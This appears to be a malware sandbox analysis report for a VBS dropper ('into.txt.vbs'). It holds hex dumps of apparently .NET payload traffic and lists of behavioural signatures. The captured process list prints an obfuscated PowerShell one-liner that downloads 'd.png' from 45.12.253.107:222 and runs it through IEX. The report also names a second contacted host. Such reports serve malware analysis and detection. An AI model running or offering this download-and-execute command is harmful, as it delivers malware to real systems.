Data received	2A062A01100000000000002A2A0006010000011B300200FA00000008000011729F230070738200000A0A066F8300000A0B076F8400000A0C388B000000086F8500000A0D0972E52300706F8600000A6F3B00000A6F8000000A1304110472FF230070282800000A392400000009722B2400706F8600000A6F3B00000A6F8700000A72372400706F8100000A3A30000000110472472400706F8100000A3A1F00000009722B2400706F8600000A6F3B00000A7255240070282800000A3908000000171305DD4E000000086F8800000A3A6AFFFFFFDD0D000000083906000000086F3600000ADCDD0D000000073906000000076F3600000ADCDD0D000000063906000000066F3600000ADCDD0600000026DD00000000162A11052A00000134000002001900A0B9000D0000000002001200B9CB000D0000000002000B00D2DD000D0000000000000000EFEF0006010000011B3002002500000009000011160A285800000A6F8900000A1200285700000626060BDD0800000026060BDD00000000072A0000000110000000000200191B0008010000011B3001002F0000000A000011726B24007028560000060A1200288A00000A3907000000170BDD0F000000160BDD0800000026160BDD00000000072A00011000000000000025250008010000011B300400650000000B0000111B8D010000012516288B00000A8C69000001A22517288C00000AA22518288D00000AA22519288E00000AA2251A287A00000A287B00000A737C00000A287D00000A8C6B000001A2288F00000A282E0000060ADD0C0000002672832400700ADD00000000062A00000001100000000000005757000C01000001133003005D0000000C000011739000000A289100000A026F2200000A0A066F9200000A0A739300000A0B060C160D381C00000008099113040712047295240070289400000A6F9500000A260917580D09088E6932DE076F3B00000A161F146F9600000A6F9700000A2A00000013300600FA0900000D00001173B90000060A0672ED2100706FA4000006729B2400706FB10000060672B12400706FA40000067E110000046FB10000060672BB2400706FA4000006288C00000A6F3B00000A6FB10000060672C52400706FA4000006737E00000A287F00000A6F3B00000A72CB240070146F9800000A72DF240070289900000A0B1201289A00000A72E324007072ED2400706F9800000A72F924007072052500706F9800000A286B00000A6FB10000060672112500706FA4000006289B00000A6FB100000606721B2500706FA4000006284B0000060B1201289A00000A6F8000000A7227250070721B2500706F9800000A723125007072BB2400706F9800000A6FB100000606723D2500706FA400000628500000066FB10000060672552500706FA40000067E0F0000046FB10000060672672500706FA4000006284D0000066FB10000062830000006392000000006727B2500706FA400000672952500706FB1000006178021000004381500000006727B2500706FA400000672F92400706FB10000067E1F00000472AD250070287200000A289C00000A39200000000672642600706FA4000006727C2600706FB100000617802100000438150000000672642600706FA400000672F92400706FB10000067E1F0000047292260070287200000A289C00000A39200000000672652700706FA4000006727B2700706FB100000617802100000438150000000672652700706FA400000672F92400706FB10000067E1F000004728F270070287200000A289C00000A39200000000672482800706FA4000006725C2800706FB100000617802100000438150000000672482800706FA400000672F92400706FB10000067E20000004726E280070287200000A289C00000A3A190000007E20000004721D290070287200000A289C00000A39200000000672AE2900706FA400000672C42900706FB100000617802100000438150000000672AE2900706FA400000672F92400706FB10000067E2000000472D8290070287200000A289C00000A3A190000007E20000004728D2A0070287200000A289C00000A39200000000672682B00706FA400000672822B00706FB100000617802100000438150000000672682B00706FA400000672F92400706FB10000067E1F000004729A2B0070287200000A289C00000A39200000000672512C00706FA4000006726F2C00706FB100000617802100000438150000000672512C00706FA400000672F92400706FB10000067E1F000004728B2C0070287200000A289C00000A392000000006725E2D00706FA4000006727A2D00706FB1000006178021000004381500000006725E2D00706FA400000672F92400706FB10000067E1F00000472942D0070287200000A289C00000A392000000006724B2E
Data received	00706FA400000672692E00706FB1000006178021000004381500000006724B2E00706FA400000672F92400706FB10000067E1F00000472852E0070287200000A289C00000A392000000006723E2F00706FA400000672582F00706FB1000006178021000004381500000006723E2F00706FA400000672F92400706FB10000067E1F00000472702F0070287200000A289C00000A39200000000672273000706FA400000672273000706FB100000617802100000438150000000672453000706FA400000672F92400706FB10000067E1F0000047261300070287200000A289C00000A39200000000672183100706FA400000672363100706FB100000617802100000438150000000672183100706FA400000672F92400706FB10000067E1F0000047252310070287200000A289C00000A39200000000672093200706FA400000672293200706FB100000617802100000438150000000672093200706FA400000672F92400706FB10000067E1F0000047247320070287200000A289C00000A39200000000672FE3200706FA400000672183300706FB100000617802100000438150000000672FE3200706FA400000672F92400706FB10000067E1F0000047230330070287200000A289C00000A39200000000672E73300706FA400000672013400706FB100000617802100000438150000000672E73300706FA400000672F92400706FB10000067E1F0000047219340070287200000A289C00000A39200000000672D03400706FA400000672EC3400706FB100000617802100000438150000000672D03400706FA400000672F92400706FB10000067E1F0000047206350070287200000A289C00000A39200000000672BD3500706FA400000672D33500706FB100000617802100000438150000000672BD3500706FA400000672F92400706FB10000067E1F00000472E7350070287200000A289C00000A39200000000672BA3600706FA400000672CE3600706FB100000617802100000438150000000672BA3600706FA400000672F92400706FB10000067E1F00000472E0360070287200000A289C00000A39200000000672993700706FA400000672AB3700706FB100000617802100000438150000000672993700706FA400000672F92400706FB10000067E2000000472BB370070287200000A289C00000A39200000000672D53700706FA400000672ED3700706FB100000617802100000438150000000672D53700706FA400000672F92400706FB10000067E200000047203380070287200000A289C00000A392000000006721D3800706FA400000672353800706FB1000006178021000004381500000006721D3800706FA400000672F92400706FB10000067E20000004724B380070287200000A289C00000A392000000006725B3800706FA4000006725B3800706FB1000006178021000004381500000006725B3800706FA400000672F92400706FB10000067E200000047269380070287200000A289C00000A39200000000672793800706FA400000672793800706FB100000617802100000438150000000672793800706FA400000672F92400706FB10000067E200000047287380070287200000A289C00000A392000000006729B3800706FA4000006729B3800706FB1000006178021000004381500000006729B3800706FA400000672F92400706FB10000067E1F00000472AD380070287200000A289C00000A39200000000672BF3800706FA400000672BF3800706FB100000617802100000438150000000672BF3800706FA400000672F92400706FB10000067E2000000472CF380070287200000A289C00000A39200000000672E13800706FA400000672E13800706FB100000617802100000438150000000672E13800706FA400000672F92400706FB10000067E2000000472F1380070287200000A289C00000A39200000000672033900706FA4000006721D3900706FB100000617802100000438150000000672033900706FA400000672F92400706FB10000060672373900706FA400000672170300706FB10000060672413900706FA40000067E130000046FB100000606724D3900706FA40000067F21000004289A00000A6FB10000060672152200706FA40000067E2C0000046FB1000006066FAE0000062A00001B300200870000000E0000117E200000047265390070287200000A0A160B06289C00000A395B00000072170300700C06289D00000A0D1613043833000000091104A33C0000011305110572993900706F9E00000A3912000000110572AB390070287200000A0C380D0000001104175813041104098E6932C608286D00000A0B3802000000160BDD0600000026DD00000000072A0001100000000012006D7F0006350000011B300400320000000F000011285800000A0A7E2700000402066FA100000A283A0000061628370000060BDD0D000000063906000000066F3600000ADC072A000001100000020006001D23000D000000001B3004008A0300001000001102163F7503000003200001000028A200000A28A300000A39600300000428A400000A0A1F14283D00000620FFFF00005F16FE030B20A0000000283D00000620008000005F3A1800000020A1000000283D00000620008000005F16FE033801000000170C0628350000060D07
Data received	6E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765744469726563746F7269657300457870616E64456E7669726F6E6D656E745661726961626C65730047657454797065730047657450726F63657373657300476574486F73744164647265737365730053797374656D2E53656375726974792E43727970746F6772617068792E58353039436572746966696361746573005266633238393844657269766542797465730052656164416C6C42797465730047657442797465730042696E64696E67466C61677300435368617270417267756D656E74496E666F466C6167730043536861727042696E646572466C61677300537472696E67730053657373696F6E456E64696E674576656E74417267730075757A474A6F7A55516B4B466A73004943726564656E7469616C73007365745F43726564656E7469616C7300457175616C730053736C50726F746F636F6C730053797374656D2E57696E646F77732E466F726D7300446E7300436F6E7461696E730053797374656D2E436F6C6C656374696F6E7300537472696E6753706C69744F7074696F6E73006D496452526B50746A4F7073006765745F436861727300476574496D6167654465636F646572730052756E74696D6548656C706572730053736C506F6C6963794572726F72730046696C654163636573730047657443757272656E7450726F63657373004950416464726573730053797374656D2E4E65742E536F636B657473007365745F417267756D656E74730053797374656D4576656E747300457869737473004B65797300497748516546556E4C6D5A4F43740066444C52714857766B6D636D5174007242614A524D566A73537400436F6E63617400496D616765466F726D6174006765745F4173466C6F6174007365745F4173466C6F6174004D616E6167656D656E74426173654F626A656374006F626A65637400436F6C6C65637400436F6E6E656374005379585043485276536863740052504B4A467556785743716374004765740053797374656D2E4E65740054617267657400536F636B65740053797374656D2E436F6C6C656374696F6E732E49456E756D657261746F722E5265736574006765745F4F6666736574007365745F4F6666736574004243534B6D73766B77506774006D6A736C4C5A70516974006F705F4578706C696369740053706C6974004578697400494173796E63526573756C7400726573756C7400546F5570706572496E76617269616E7400576562436C69656E74004173796E63436C69656E74006765745F53736C436C69656E74007365745F53736C436C69656E74006765745F546370436C69656E74007365745F546370436C69656E740041757468656E7469636174654173436C69656E740053797374656D2E4D616E6167656D656E7400456E7669726F6E6D656E740053797374656D2E436F6C6C656374696F6E732E49456E756D657261746F722E6765745F43757272656E740047657443757272656E7400436865636B52656D6F7465446562756767657250726573656E74004A51446366736269626E77666E74006765745F52656D6F7465456E64506F696E74006765745F436F756E74006765745F5469636B436F756E74006765745F50726F636573736F72436F756E740047657450617468526F6F740054505454436D685A5557717400506172616D65746572697A6564546872656164537461727400436F6E76657274004661696C4661737400546F4C697374004765744B6579626F6172644C61796F75740053797374656D2E436F6C6C656374696F6E732E49456E756D657261746F722E4D6F76654E6578740053797374656D2E546578740052656164416C6C54657874004765745465787400536574546578740047657457696E646F7754657874007A566B466A6E41616B4F70635642750063534E72676B75454D750071446C706B56514E796E53434E7500456E4B464348716E504B5775006E4C595051777164537675684D6375007661586D516156526975004C4776626A4E694D46624D546A7500454556465042467248686D7500797348484E6A536E67754A76004B794E42584D634E567600686D547673466C6C46496C
Data received	12F20E1F78E0C5A2006E9F78B6138EDF8FFFF03112111231611238E69283300000A007E22000004097B02000004110F111F58112311238E6912016F4400000616FE01132411242C08204AA0AE7F252B0620EEC1F12E2526112F206BA8BD2E5A61389AF8FFFF11162C082048728CD7252B06208F19CA9D2526112F20024BF7EF5A613879F8FFFF111E1111FE04132520E32264853867F8FFFF7E22000004097B02000004110A1E5811121A12016F4400000616FE011326112F206B96EDCE5A20BC9CCB75613836F8FFFF0020F4C123A3382BF8FFFFD031000001281500000A1104282F00000A725F000070285E00000617188D090000012517188D09000001251603A225171F3C8C2C000001A2A2283100000AA52C000001130720EE4CC68B38DCF7FFFF112F20DC8DD0D65A209B129F546138C9F7FFFFD031000001281500000A1104282F00000A14188D09000001251603A2251711101F0C588C2C000001A26F1800000AA52C000001131FD031000001281500000A1104282F00000A14188D09000001251603A2251711101F10588C2C000001A26F1800000AA52C0000011320D031000001281500000A1104282F00000A14188D09000001251603A2251711101F14588C2C000001A26F1800000AA52C0000011321112016FE031322112F20E979388A5A204139F27A613810F7FFFF732D00000A7A112F203879C2605A20C5D3F2D46138F7F6FFFF732D00000A7A112F20D3DE20415A204E0C443B6138DEF6FFFF1108130F112F208E697C1D5A20482983D46138C7F6FFFF732D00000A7A112F208B91D9CA5A207809BC0F6138AEF6FFFF11172D0820D1E80409252B0620D70FCE322526112F20290D695D5A61388DF6FFFF11091F2994130A16130B203EBBE2A33879F6FFFF732D00000A7A112F20DA0DCA965A207E990137613860F6FFFFD031000001281500000A1104282F00000A725F000070285E00000617188D090000012517188D09000001251603A2251711071F28588C2C000001A2A2283100000AA52C000001131320C25B39AB380EF6FFFF111E1758131E112F207B56CF245A20308B7AFC6138F5F5FFFF007E20000004097B0300000411096F3C00000616FE011317112F207DC753285A20B

Poweshell is sending data to a remote host (1 event)

Data sent

GET /d.png HTTP/1.1 Host: 45.12.253.107:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 11, 2023, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (2 events)

host	185.157.162.126
host	45.12.253.107

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send July 11, 2023, 10 a.m.	buffer: GET /d.png HTTP/1.1 Host: 45.12.253.107:222 Connection: Keep-Alive socket: 1412 sent: 72	1	72	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Replace '~','') \| IEX
parent_process	wscript.exe				martian_process	powershell $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Replace '~','') \| IEX

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

into.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All